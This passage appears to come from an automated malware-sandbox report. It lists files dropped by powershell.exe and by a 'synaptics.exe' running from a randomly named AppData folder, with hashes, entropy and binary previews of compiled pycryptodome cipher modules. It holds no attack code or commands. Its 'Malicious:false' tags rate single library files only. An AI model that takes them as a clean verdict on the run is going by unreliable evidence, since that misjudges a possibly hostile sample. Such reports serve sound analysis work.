                                                                                                                                                                                                            Preview:o.......\..gV........................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.d.d...Z.d.S.).a.....Module's constants for the modes of operation supported with CAST:..:var MODE_ECB: :ref:`Electronic Code Book (ECB) <ecb_mode>`.:var MODE_CBC: :ref:`Cipher-Block Chaining (CBC) <cbc_mode>`.:var MODE_CFB: :ref:`Cipher FeedBack (CFB) <cfb_mode>`.:var MODE_OFB: :ref:`Output FeedBack (OFB) <ofb_mode>`.:var MODE_CTR: :ref:`CounTer Mode (CTR) <ctr_mode>`.:var MODE_OPENPGP: :ref:`OpenPGP Mode <openpgp_mode>`.:var MODE_EAX: :ref:`EAX Mode <eax_mode>`......N)..._create_cipher)...byte_string)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptrz.Crypto.Cipher._raw_casta..... int CAST_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);. int
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7433
                                                                                                                                                                                                            Entropy (8bit):5.292323319217265
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:dhFrHCPOiGmjs8WRLfYotgdFxjDi26AN0JlUFmxwIUu:7BC2iGmxUfNedFZi26n3UFmxwIN
                                                                                                                                                                                                            MD5:BFB1E18AF4EAF356174B48CAE9258E9B
                                                                                                                                                                                                            SHA1:1CC366E4E9CC06906E64AC31EA633B6AC0FBC764
                                                                                                                                                                                                            SHA-256:9395FC1FFD567E69A7602170C97F472BADC84B1062E4109DB296BC23821639F8
                                                                                                                                                                                                            SHA-512:B91C8C0F8AA125FD483776B93C25EF2C1FB811433336B4CE27EC39D82DAA8DD020C405FB6CB2DCD90F461EE0022CE633584FAF3AE611EE46630733E861B4D028
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......\..g.+.......................@...s....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.d...Z.d.Z.d.Z.d.S.)......)...get_random_bytes)..._copy_bytes)...load_pycryptodome_raw_lib..create_string_buffer..get_raw_buffer..VoidPointer..SmartPointer..c_size_t..c_uint8_ptr..c_ulong..is_writeable_bufferz.Crypto.Cipher._chacha20a..... int chacha20_init(void **pState,. const uint8_t *key,. size_t keySize,. const uint8_t *nonce,. size_t nonceSize);.. int chacha20_destroy(void *state);.. int chacha20_encrypt(void *state,. const uint8_t in[],. uint8_t out[],. size_t len);.. int chacha20_seek(v
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9908
                                                                                                                                                                                                            Entropy (8bit):5.389173868492932
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:gYX1iNeiMjjC5sZCyROA+8dSR2LPEi6YBak/2n0:gYFiNeM+cyRu22M/2n0
                                                                                                                                                                                                            MD5:5FE5F2584337F259D2BA5A23DAE9D831
                                                                                                                                                                                                            SHA1:892BA8F3A6BE124F1523DABD5EAA99F2799D9E43
                                                                                                                                                                                                            SHA-256:11BEF31026B709B25962C525D39FB1D9999E41D2DCED878835EA5A304ADCB995
                                                                                                                                                                                                            SHA-512:77D1FDD9D0A646B7442F29A9F6514483E326A07071A389F518C5259C4822A35D4D3ECDF8DDD9DD420F06D67702AF278DD472F938A32DEFC887D0D2DB8A9613BD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......\..gO........................@...s....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d...Z.e.d.d.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.Z.d.S.)......)...unhexlify)...ChaCha20)..._HChaCha20)...Poly1305..BLAKE2s)...get_random_bytes)...long_to_bytes)..._copy_bytes..bord)...is_bufferc....................K...s....t.d.d.|...S.).N..Enum..)...type)...enumsr....r.....vC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\Crypto/Cipher/ChaCha20_Poly1305.py.._enum,...s......r...................)...PROCESSING_AUTH_DATA..PROCESSING_CIPHERTEXT..PROCESSING_DONEc....................@...st...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...ChaCha20Poly1305Cipherz.ChaCha20-Poly1305 and XChaCha20-Poly1305 cipher object.. Do not create it directly. Use :py:func:`new` instead... :var nonce: The nonce with length 8, 12 or 24 bytes. :varty
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5009
                                                                                                                                                                                                            Entropy (8bit):5.177059936451635
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:DFDtaCGJ/VGx/uxcVM4x6stLAv74Ppl8yWW:RwZApuSM4ftcsvnZ
                                                                                                                                                                                                            MD5:A58DC3AAC6D7CF17896BBA5202E8CB88
                                                                                                                                                                                                            SHA1:6EA317EA88EC0D80EB58B6BCB3A5A1FF19CD844A
                                                                                                                                                                                                            SHA-256:5646B5F8F4E92D9961C202744C0E7A8F3728FBB8DCB5548D75AE27504AD33206
                                                                                                                                                                                                            SHA-512:3A7C63747A95F31F39AAA47E7C529780742531ED71D272DAFC8527D6A8F3AD399F191807E760C3DAA78F48EB93617B54C820A806EBDB7A937A30B5D4713EE1C7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......\..g.........................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.S.).a.....Module's constants for the modes of operation supported with Single DES:..:var MODE_ECB: :ref:`Electronic Code Book (ECB) <ecb_mode>`.:var MODE_CBC: :ref:`Cipher-Block Chaining (CBC) <cbc_mode>`.:var MODE_CFB: :ref:`Cipher FeedBack (CFB) <cfb_mode>`.:var MODE_OFB: :ref:`Output FeedBack (OFB) <ofb_mode>`.:var MODE_CTR: :ref:`CounTer Mode (CTR) <ctr_mode>`.:var MODE_OPENPGP: :ref:`OpenPGP Mode <openpgp_mode>`.:var MODE_EAX: :ref:`EAX Mode <eax_mode>`......N)..._create_cipher)...byte_string)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptrz.Crypto.Cipher._raw_desa..... int DES_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);. int DES_encrypt(const vo
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4983
                                                                                                                                                                                                            Entropy (8bit):5.175961470758332
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:SFDtaCGJ/VGx/ux3LM4x6stLAv74PJlQKGW:EwZApu5M4ftcsPzJ
                                                                                                                                                                                                            MD5:76738B6D3AAE84DCE88B3B80AB4A2E4F
                                                                                                                                                                                                            SHA1:7F8AB5DA4E1B5DF2B13B46E56AE3353CE3C4AF6D
                                                                                                                                                                                                            SHA-256:8DF8B2CF15B0859C6EC6A2E79506F98FC24767C5613AA2CC23AC1594D30124CB
                                                                                                                                                                                                            SHA-512:053D3026C6B59E9E30504A3EEE7236E21271072AE0F608C3511C9E5EFCE71FF6B8D97AD356FF1202A9A6058F51E305377DC42272D55C5905B3FDD16978BD0DEB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.S.).a.....Module's constants for the modes of operation supported with Single DES:..:var MODE_ECB: :ref:`Electronic Code Book (ECB) <ecb_mode>`.:var MODE_CBC: :ref:`Cipher-Block Chaining (CBC) <cbc_mode>`.:var MODE_CFB: :ref:`Cipher FeedBack (CFB) <cfb_mode>`.:var MODE_OFB: :ref:`Output FeedBack (OFB) <ofb_mode>`.:var MODE_CTR: :ref:`CounTer Mode (CTR) <ctr_mode>`.:var MODE_OPENPGP: :ref:`OpenPGP Mode <openpgp_mode>`.:var MODE_EAX: :ref:`EAX Mode <eax_mode>`......N)..._create_cipher)...byte_string)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptrz.Crypto.Cipher._raw_desa..... int DES_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);. int DES_encrypt(const vo
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4983
                                                                                                                                                                                                            Entropy (8bit):5.175961470758332
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:SFDtaCGJ/VGx/ux3LM4x6stLAv74PJlQKGW:EwZApu5M4ftcsPzJ
                                                                                                                                                                                                            MD5:76738B6D3AAE84DCE88B3B80AB4A2E4F
                                                                                                                                                                                                            SHA1:7F8AB5DA4E1B5DF2B13B46E56AE3353CE3C4AF6D
                                                                                                                                                                                                            SHA-256:8DF8B2CF15B0859C6EC6A2E79506F98FC24767C5613AA2CC23AC1594D30124CB
                                                                                                                                                                                                            SHA-512:053D3026C6B59E9E30504A3EEE7236E21271072AE0F608C3511C9E5EFCE71FF6B8D97AD356FF1202A9A6058F51E305377DC42272D55C5905B3FDD16978BD0DEB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.S.).a.....Module's constants for the modes of operation supported with Single DES:..:var MODE_ECB: :ref:`Electronic Code Book (ECB) <ecb_mode>`.:var MODE_CBC: :ref:`Cipher-Block Chaining (CBC) <cbc_mode>`.:var MODE_CFB: :ref:`Cipher FeedBack (CFB) <cfb_mode>`.:var MODE_OFB: :ref:`Output FeedBack (OFB) <ofb_mode>`.:var MODE_CTR: :ref:`CounTer Mode (CTR) <ctr_mode>`.:var MODE_OPENPGP: :ref:`OpenPGP Mode <openpgp_mode>`.:var MODE_EAX: :ref:`EAX Mode <eax_mode>`......N)..._create_cipher)...byte_string)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptrz.Crypto.Cipher._raw_desa..... int DES_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);. int DES_encrypt(const vo
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6222
                                                                                                                                                                                                            Entropy (8bit):5.265701354310097
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:k3Pz+cF8LjRVdNkIOMw36Rc/2QlAemPTiC6TtLAvE4YMxvulHEc:u+pB8MD1aePTi/tcfYSvwkc
                                                                                                                                                                                                            MD5:E57E2B1FC73340F8842891C5930E9D3B
                                                                                                                                                                                                            SHA1:CB2974F4D1C3D86874D0C1194972F45D453CEB5C
                                                                                                                                                                                                            SHA-256:15C18ADEA26BF28BC6314D8FBADBFB94FA27BEF9692F79988594EE112057C659
                                                                                                                                                                                                            SHA-512:C19EFCE6BFEEDF61AF4524FE4A2C01B5503BBF74EC7641C3BF3EC388BDCD60AE3CC762C50ADD8E9FC54A869A986E4240A866D5C769EC9EE5F8EFC7A1834A445D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......\..g.........................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.S.).a.....Module's constants for the modes of operation supported with Triple DES:..:var MODE_ECB: :ref:`Electronic Code Book (ECB) <ecb_mode>`.:var MODE_CBC: :ref:`Cipher-Block Chaining (CBC) <cbc_mode>`.:var MODE_CFB: :ref:`Cipher FeedBack (CFB) <cfb_mode>`.:var MODE_OFB: :ref:`Output FeedBack (OFB) <ofb_mode>`.:var MODE_CTR: :ref:`CounTer Mode (CTR) <ctr_mode>`.:var MODE_OPENPGP: :ref:`OpenPGP Mode <openpgp_mode>`.:var MODE_EAX: :ref:`EAX Mode <eax_mode>`......N)..._create_cipher)...byte_string..bchr..bord..bstr)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_tz.Crypto.Cipher._raw_des3a..... int DES3_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6196
                                                                                                                                                                                                            Entropy (8bit):5.265726679088953
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:r3Pz+cF8LjRVdNkIOMwoYRc/2QlAeiPTiC6TtLAvE4YMxbulb5ac:H+pB8MQ1aqPTi/tcfYSbwAc
                                                                                                                                                                                                            MD5:B31A8CAEE5AAE11C38A9446A73F48E49
                                                                                                                                                                                                            SHA1:BBE58F0CEF31ED7973C0D5C01191936C7731A946
                                                                                                                                                                                                            SHA-256:D50C669F9E370E1E947AD63953B1A4DE2FF6B4FD6ABE57F8F54AC08B62E24AE4
                                                                                                                                                                                                            SHA-512:7E2E1226D7D90E7C767F28F9E0942803037C1AE2E841009AFA864DCD56807FE71B668987618C30EC51521D5E76038CA87E774760CDACB2E72992A5FDE668633E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.S.).a.....Module's constants for the modes of operation supported with Triple DES:..:var MODE_ECB: :ref:`Electronic Code Book (ECB) <ecb_mode>`.:var MODE_CBC: :ref:`Cipher-Block Chaining (CBC) <cbc_mode>`.:var MODE_CFB: :ref:`Cipher FeedBack (CFB) <cfb_mode>`.:var MODE_OFB: :ref:`Output FeedBack (OFB) <ofb_mode>`.:var MODE_CTR: :ref:`CounTer Mode (CTR) <ctr_mode>`.:var MODE_OPENPGP: :ref:`OpenPGP Mode <openpgp_mode>`.:var MODE_EAX: :ref:`EAX Mode <eax_mode>`......N)..._create_cipher)...byte_string..bchr..bord..bstr)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_tz.Crypto.Cipher._raw_des3a..... int DES3_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6986
                                                                                                                                                                                                            Entropy (8bit):5.306052808645679
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:15y77I5xO5Xqk0muyjjUAWWzc+otDMgM6fEB1RZYVLgKbHbgKqkfz98RFA/Ca:C7FFFpzktQgU1gBgArFf+Aqa
                                                                                                                                                                                                            MD5:E6D73253BCB4B12C58F2F93875CF8FD0
                                                                                                                                                                                                            SHA1:7584B4898BD8F9AA5FE3B82E939EAEF894FE25DE
                                                                                                                                                                                                            SHA-256:4EF08F4A19082775A9A563117573499E9CDD4890B430542A73806500B9B53FB2
                                                                                                                                                                                                            SHA-512:594E1BE6E7CD36DD9FFE79169897578033DA4104D311699B186C969C6C4231ABEE9AF14DD4B0DDB1C61782310B05CD16C414636AFC3018D6EC698A2CC87DD52A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......\..gO".......................@...s|...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d...Z.d.d.d...Z.d.S.)......)...MGF1N)..._copy_bytes)...ceil_div..bytes_to_long..long_to_bytes)...strxor)...Random.....)...oaep_decodec....................@...s8...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...PKCS1OAEP_CipherzXCipher object for PKCS#1 v1.5 OAEP.. Do not create directly: use :func:`new` instead.c........................sN...|..._.|.r.|..._.n.t.j.j..._.|.r.|..._.n...f.d.d....._.t.d.d.|....._.|..._.d.S.).a....Initialize this PKCS#1 OAEP cipher object... :Parameters:. key : an RSA key object. If a private half is given, both encryption and decryption are possible.. If a public half is given, only encryption is possible.. hashAlgo : hash object. The hash function to use. This can be a module under `Crypto.Hash`. or an existing h
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6960
                                                                                                                                                                                                            Entropy (8bit):5.306197600183762
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:g5y77I5xO5Xqk0mul9jUAWWiD+wtDMgMzfEB1RZYVrdKlHbgKqkfzBA/CF:H7FFFpiMtQg/1g1dmrFf6qF
                                                                                                                                                                                                            MD5:81636EECE93E50AD0D15F435A61D312D
                                                                                                                                                                                                            SHA1:E6376B6E50086F9CF5DADC5F308B28D364063947
                                                                                                                                                                                                            SHA-256:8A60D759C5EFC60C2EEC1D5E31A5E9AAEA3FD48C2264457C8E9AB859FC110C96
                                                                                                                                                                                                            SHA-512:E8527336059CEAECE4E407344812E68ADE0092DE5CF25F0D29DF36BB624AF5BEEB1E1198DFFE71FD42BC7B66AB7BA9543F47DC4C8B526AAB37E786E0F8526457
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gO".......................@...s|...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d...Z.d.d.d...Z.d.S.)......)...MGF1N)..._copy_bytes)...ceil_div..bytes_to_long..long_to_bytes)...strxor)...Random.....)...oaep_decodec....................@...s8...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...PKCS1OAEP_CipherzXCipher object for PKCS#1 v1.5 OAEP.. Do not create directly: use :func:`new` instead.c........................sN...|..._.|.r.|..._.n.t.j.j..._.|.r.|..._.n...f.d.d....._.t.d.d.|....._.|..._.d.S.).a....Initialize this PKCS#1 OAEP cipher object... :Parameters:. key : an RSA key object. If a private half is given, both encryption and decryption are possible.. If a public half is given, only encryption is possible.. hashAlgo : hash object. The hash function to use. This can be a module under `Crypto.Hash`. or an existing h
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5911
                                                                                                                                                                                                            Entropy (8bit):5.284784035043155
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Scfek2uYk/q6NuMxlQtDsS+0OEM+78F2ON5egCot6nTIof5l:Skl1NuMfcsUl8rNkgCAa8M
                                                                                                                                                                                                            MD5:70C7D8052DC62CF0C38F539E7826B73C
                                                                                                                                                                                                            SHA1:DA9FA2A13EC4C2509D933236F019A26DA46D7F2F
                                                                                                                                                                                                            SHA-256:BB8E8BFC224970CF463A199EE8EC912CA6D0F34FA0D1092D76C44C9444112C74
                                                                                                                                                                                                            SHA-512:89DF24FF6D307BA442B5F7F252CAA5B5FD8B518B43C8F17710E1F044109859C08258B13F438CE0FD0B00179D8EF7C04BD55B2AF9EBE856319951BD0494E43ED4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......\..g(........................@...s`...d.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...G.d.d...d...Z.d.d.d...Z.d.S.)...new..PKCS115_Cipher.....)...Random)...bytes_to_long..long_to_bytes)...bord..is_bytes.._copy_bytes.....)...pkcs1_decodec....................@...s:...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.S.).r....z.This cipher can perform PKCS#1 v1.5 RSA encryption or decryption.. Do not instantiate directly. Use :func:`Crypto.Cipher.PKCS1_v1_5.new` instead.c....................C...s....|.|._.|.|._.d.S.).aJ...Initialize this PKCS#1 v1.5 cipher object... :Parameters:. key : an RSA key object. If a private half is given, both encryption and decryption are possible.. If a public half is given, only encryption is possible.. randfunc : callable. Function that returns random bytes.. N)..._key.._randfunc)...self..key..randfunc..r.....oC:\Users\Administrator\AppData\Local\Programs\Python\Pyt
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4627
                                                                                                                                                                                                            Entropy (8bit):5.260530177016623
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:kY9kv6EaKOWWTDgEbkrIQLrx89pWyRVvHvn:koHXLT0OkDyRVX
                                                                                                                                                                                                            MD5:B999932CA7D9FC6106CA455EA9A9BA8D
                                                                                                                                                                                                            SHA1:209E71CE7099609E9FEB49DD0895B4614026B914
                                                                                                                                                                                                            SHA-256:17578D996A44DE0FCA5C4DB3295F53CA596FE92B2CA56D64F4FDD402AA3EC462
                                                                                                                                                                                                            SHA-512:92209E604A80C21A30A659A952E5678056523CC15904D98E88971D908F1F613A6203BE223B38FFF4A5CAC2FA420490BE3EFDE74928748DBD7A7DCE1A36EF50E0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......\..gt........................@...sn...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.d.d...Z.G.d.d...d...Z.d.d.d...Z.d.Z.d.Z.d.S.)......)..._copy_bytes)...load_pycryptodome_raw_lib..create_string_buffer..get_raw_buffer..VoidPointer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Crypto.Cipher._Salsa20a..... int Salsa20_stream_init(uint8_t *key, size_t keylen,. uint8_t *nonce, size_t nonce_len,. void **pSalsaState);. int Salsa20_stream_destroy(void *salsaState);. int Salsa20_stream_encrypt(void *salsaState,. const uint8_t in[],. uint8_t out[], size_t len);. c....................@...s,...e.Z.d.Z.d.Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.)...Salsa20Cipherz.Salsa20 cipher object. Do not cr
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3499
                                                                                                                                                                                                            Entropy (8bit):5.132345497462905
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:HPqqXvaWWWaDfy0ivDDMqJnNd7moVH1UuHEP:HKLyV3Pf7mQ1TI
                                                                                                                                                                                                            MD5:365E6F9DBCE7B598171AF96250391314
                                                                                                                                                                                                            SHA1:DC3C29C4FD50AF5D5B5C18A754C4652C0495D5F1
                                                                                                                                                                                                            SHA-256:CA1A95C7622015B9D13EBAC143E39F5B4ACDE6606EAA06E0D16F2F2CF7650398
                                                                                                                                                                                                            SHA-512:312B28A8A40D0D6DB1E292D488B75B8EDFFFA26F19DCC02A6C07BE9B39FC83631E8FBE67DAD1E46DFA146573392C366F0737EC64B9E660273B28F4572DFAA481
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......\..g.........................@...sd...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.e.d.d...Z.d.S.)......N)..._create_cipher)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptr..c_uintz.Crypto.Cipher._raw_eksblowfishaa.... int EKSBlowfish_start_operation(const uint8_t key[],. size_t key_len,. const uint8_t salt[16],. size_t salt_len,. unsigned cost,. unsigned invert,. void **pResult);. int EKSBlowfish_encrypt(const void *state,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int EKSBlowfish_decrypt(const void *state,. const uint8_t *
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1727
                                                                                                                                                                                                            Entropy (8bit):5.419091855224699
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:YozLMJbLqGllz8RRyglZZX2lsLtLaLaLLLLv+rLALiLLxLJLOfi:YozCbLqylz8Rsg+Cfuai
                                                                                                                                                                                                            MD5:8E105C1E09DB368D1868B2EFC671FB62
                                                                                                                                                                                                            SHA1:242DDBA1EA66B5B98FD37976EB3CE9A66C1F501A
                                                                                                                                                                                                            SHA-256:8D25516ABB73BAA31CDC443B71712877A15225AED612D6A01A1BFC8B6D04BDD9
                                                                                                                                                                                                            SHA-512:B30256901C3936E1843404E99213F9FBE4762CFEFD952AB2187BBD9828D0B87AA0DC44EABC0DA54A5570A1EB416E55036FE1E978B071E04B0918B87E87AEE88A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......\..gk........................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.e.e.e.e.e.e.d...Z.e.e.e.e.d...Z.d.d...Z.d.S.)......N)..._create_ecb_cipher)..._create_cbc_cipher)..._create_cfb_cipher)..._create_ofb_cipher)..._create_ctr_cipher)..._create_openpgp_cipher)..._create_ccm_cipher)..._create_eax_cipher)..._create_siv_cipher)..._create_gcm_cipher)..._create_ocb_cipher)....................................).....................c....................O...s....|.|.d.<.t.t...}.|...d.d...r.|...t.....|.|.v.r.t.d.....|.r^|.d.v.r2t.|...d.k.r+t.d.....|.d...|.d.<.n,|.d.v.rGt.|...d.k.r@t.d.....|.d...|.d.<.n.|.d.k.rVt.|...d.k.rUt.d.....n.|.d.k.r^t.d.....|.|...|.f.i.|.....S.).N..keyZ.add_aes_modesFz.Mode not supported).r....r....r....r....r....r....z Too many arguments for this moder......nonce).r....r....r....r....Z.IVr....z%IV is not meaningful for the ECB mode)...dict.._modes..pop..up
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1701
                                                                                                                                                                                                            Entropy (8bit):5.41346800473241
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:NozLMJbLqGllz8RRygl2KGLtLaLaLLLLv+rLALiLLxLJLOfi:NozCbLqylz8Rsg1Ifuai
                                                                                                                                                                                                            MD5:ACA025064F751C120733CAC69422668F
                                                                                                                                                                                                            SHA1:7ABBC40CD554DC11BC9D82B2647EF5F851F1B3A3
